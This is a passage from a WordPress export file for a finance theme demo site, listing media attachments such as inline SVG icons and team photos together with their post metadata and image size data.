C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>aim</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/aim/</link>
		<pubDate>Wed, 09 Sep 2020 08:24:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/aim.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>660</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:24:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:24:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[aim]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/aim.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/aim.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>money</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/money/</link>
		<pubDate>Wed, 09 Sep 2020 08:25:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/money.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>663</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:25:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:25:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/money.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/money.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/portfolio-2/</link>
		<pubDate>Wed, 09 Sep 2020 08:35:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/portfolio.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>666</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:35:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:35:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/portfolio.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/portfolio.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/pheader-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>691</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:26:"2020/09/pheader-team.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"pheader-team-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"pheader-team-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"pheader-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"pheader-team-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"pheader-team-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-team-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-team-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"pheader-team-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"pheader-team-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/team5/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>694</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team5-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team5-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team5-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/team6/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>695</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team6-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team6-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team6-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team6-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team6-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team7</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/team7/</link>
		<pubDate>Wed, 09 Sep 2020 09:45:13 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team7.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>696</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:45:13]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:45:13]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team7]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team7.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team7.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team7.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team7-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team7-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team7-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team7-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team7-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption"